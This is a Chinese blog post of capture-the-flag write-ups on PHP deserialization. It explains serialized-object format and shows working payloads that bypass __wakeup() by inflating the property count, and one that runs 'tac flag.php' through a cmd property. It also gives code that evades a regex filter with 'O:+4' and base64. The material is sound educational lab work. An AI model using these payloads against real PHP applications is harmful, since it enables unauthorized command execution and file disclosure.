WEB_PHP_反序列绕过

最新推荐文章于 2024-07-08 16:56:31 发布
最新推荐文章于 2024-07-08 16:56:31 发布
阅读量19 收藏
点赞数 1
分类专栏: web 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65204980/article/details/134655420
版权

反序列化

Bugku

1.安慰奖

进入场景空白没什么提示

看源代码 注释解码提示备份

咱就用目录扫描工具扫出index.php.bak里有源代码

简单审计发现__wakeup()说明是反序 还过滤了一些liunx的命令

题对$select进行了反序列化构造code的序列化,来得到flag

我们要传入两个参数

protected $username = 'hack';

protected $cmd = 'NULL';

构造反序代码

<?php

class ctf{

protected $username='admin';

protected $cmd='tac flag.php';

}

$a=new ctf();

echo(serialize($a))

?>

?code=O:3:"ctf":2:{s:11:"*username";s:5:"admin";s:6:"*cmd";s:2:"ls";}

O 代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示

3 代表类名字占三个字符

ctf 类名

3 代表三个属性,因为需要绕过__wakeup()函数,所以比实际属性个数2大

s代表字符串

11代表属性名长度

username 属性名

s:5:"admin" 字符串 属性值长度 属性值

private属性被序列化的时候属性值会变成%00类名%00属性名,根据规则进行修改

绕过__wakeup()

?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}看文件

?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac+flag.php";}进入flag

攻防世界

1.underialize3

进入场景 看到一串代码通过审计搜索发现是用php反序列漏洞做

了解了什么是序列化编码(将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串)和反序列解码

(__construct():当对象创建(new)时会自动调用,但在unserialize()时是不会自动调用的(构造函数)

__destruct():当对象操作执行完毕后自动执行destruct()函数的代码

__wakeup():unserialize()时自动调用

__call()方法当调用类实例中不存在的函数时自动执行)

通过搜索知道要得到序列化的值 要通过PHP搭个文件得到

然后通过_wakeup()漏洞修改序列化的参数代入url得到flag

2.web_php_unserializej

进入场景

看到_wakeup就知道是反序列 但是有preg_match()需要绕过 而且需要base64加密

$A = new Demo ('fl4g.php');                                  //创建对象

$C = serialize($A);                     //对对象A进行序列化

$C = str_replace('O:4','O:+4',$C);      //绕过正则表达式过滤

$C = str_replace(':1:',':2:',$C);             //wakeup绕过

var_dump($C);

var_dump(base64_encode($C));            //base64加密

传参 得到flag

小犹太879
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
21-3 PHP序列化漏洞-魔术方法绕过
weixin_43263566的博客
01-17 500
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客大挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
php序列化construct绕过,PHP序列化漏洞
weixin_39824801的博客
03-11 1637
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:class S{public $test="pikachu";}$s=new S(); //创建一个对象serialize($s); //把这个对象进行序列序列化后得到的结果是这个样子的:O:1:"...
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserialize(php序列化漏洞绕过__wakeup()函数、正则表达式)
Onlyone_1314的博客
11-27 1118
打开题目地址: 这也是一个php序列化的题目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
2021-02-23-ctf-Web_php_unserialize序列化漏洞
Be Smart
03-23 462
layout: post title: “ctf-Web_php_unserialize序列化漏洞” categories: [ctf] tags: [php] 一.根据题目猜测和序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 .
CTF技巧_Web——PHP特性_序列化逃逸
Ho1aAs‘s Blog
11-01 386
文章目录一、简述二、PHP源码三、方法及原理 一、简述 目的是通过序列化逃逸,传入我们想要的变量值,从而绕过某些方法,例如类的__wakeup 序列化逃逸的本质是传入序列化串的后半部分使得序列化串过早闭合,这样就可以传入参数 二、PHP源码 <?php function change($str){ return str_replace("t","tt",$str); } $source = 'str_replace("t","tt",$str);<br/>$input = $
php序列化漏洞(万字详解)
永不落的梦想
07-26 3550
php序列化万字文章详解,非常全面,并结合实际案例易于理解,包括pop链、字符串逃逸、session序列化、phar序列化、原生类的利用以及各种绕过方式。
WEB安全-PHP序列化漏洞原理
qq_59350385的博客
04-11 1735
一、漏洞原理 在提及漏洞前,首先要先理解PHP中的serialize()和unserialize()两个函数(由于没有PHP开发基础,请各位大哥指出小弟本文中的错误),serizlize()就是将变量、对象、数组等数据类型转换成字符串方便进行网络传输和存储,再通过unserialize()将字符串进行转换成原来的数据。当存在序列化函数及可利用魔术方法时,且unserialize()接受到的字符串对于用户是可控时,用户可针对使用的magic function(魔术方法)来构造特定的语句,从而达到控制整个
序列化__wakeup()绕过
csjjjd的博客
01-24 583
这里因为flag在flag.php但是我只要进行序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
PHP序列化字符串逃逸
Aiwin的博客
01-10 884
PHP序列化字符串逃逸
shiro 序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列化漏洞。 序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Java序列化漏洞检查工具V1.2_Weblogic XML序列化漏洞检查工具CVE-2017-10271
11-11
Java序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java序列化漏洞检查工具V1.2_Weblogic XML序列化漏洞检查...
PHP序列化漏洞详解.rar
02-07
在IT安全领域,PHP序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
深入浅析PHP的session序列化漏洞问题
10-19
主要介绍了PHP的session序列化漏洞问题,需要的朋友可以参考下
PHP序列化漏洞研究
06-17
PHP序列化漏洞研究 PHP序列化漏洞是指攻击者可以通过构造恶意的序列化数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
Android 系统网络、时间服务器配置修改
ange_li的博客
07-03 231
刷机国外android rom 修改配置的常用命令
Laravel Excel导出功能:高效实现数据导出
最新发布
liuxin33445566的博客
07-08 912
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
Android约束布局的概念与属性(1)
学无止境,止于至善
07-08 496
约束布局推荐使用所见即所得的模式进行布局,约束布局的大部分布局可以通过Design视图完成,可以在布局文件的Design视图中采用鼠标拖放操作结合属性栏窗口设置完成约束布局的界面设计,大幅简化布局代码输入和控件间位置关系的人为判断。如图2所示,被选中的控件分别与上方控件左对齐,与右边的控件底对齐,同样也确定了该控件的位置。相对定位是控件对于另一个控件位置的约束,可以让控件相对于其他控件或父控件进行布局,也可以设置控件相对于其他控件或父控件进行上下左右对齐。图中设置为0.6,即控件位于布局宽度60%的位置。
android 国内下载Gradle源
听我俩天的博客
07-03 286
在中国使用 Gradle 时,可以配置使用一些国内的镜像源,以提高下载速度和稳定性。使用这些国内镜像源可以显著提高 Gradle 的下载速度。使用这些镜像源地址。
WebLogic_T3序列化漏洞
09-01
WebLogic_T3序列化漏洞是指在WebLogic应用服务器中存在的一种安全漏洞,攻击者可以利用该漏洞通过T3协议和IIOP协议触发序列化操作,从而执行恶意代码或者导致拒绝服务攻击。 这个漏洞的存在是因为WebLogic在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值